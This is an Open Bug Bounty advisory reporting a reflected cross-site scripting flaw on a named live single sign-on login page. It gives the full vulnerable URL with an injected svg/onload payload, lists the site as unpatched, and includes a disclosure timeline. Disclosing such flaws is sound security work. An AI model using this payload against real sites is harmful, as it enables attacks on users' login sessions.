sso.ovbportal.sk XSS vulnerability

2017-01-08T11:12:00
ID OBB:204403
Type openbugbounty
Reporter Spam404
Modified 2017-04-02T12:14:00

Description

Vulnerable URL:
https://sso.ovbportal.sk/authenticationendpoint/login.do?type=oidc&sessionDataKey;=3c04b82e-846f-40a1-91a4-9afe99b6810b&relyingParty;=null&type;=oidc&sp;=default&isSaaSApp;=true&authenticators;=BasicAuthenticator:LOCAL%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check sso.ovbportal.sk SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 8 January, 2017 11:12 GMT
Generic security notifications sent to website owner| 8 January, 2017 11:15 GMT
Vulnerability details disclosed by researcher| 2 April, 2017 12:14 GMT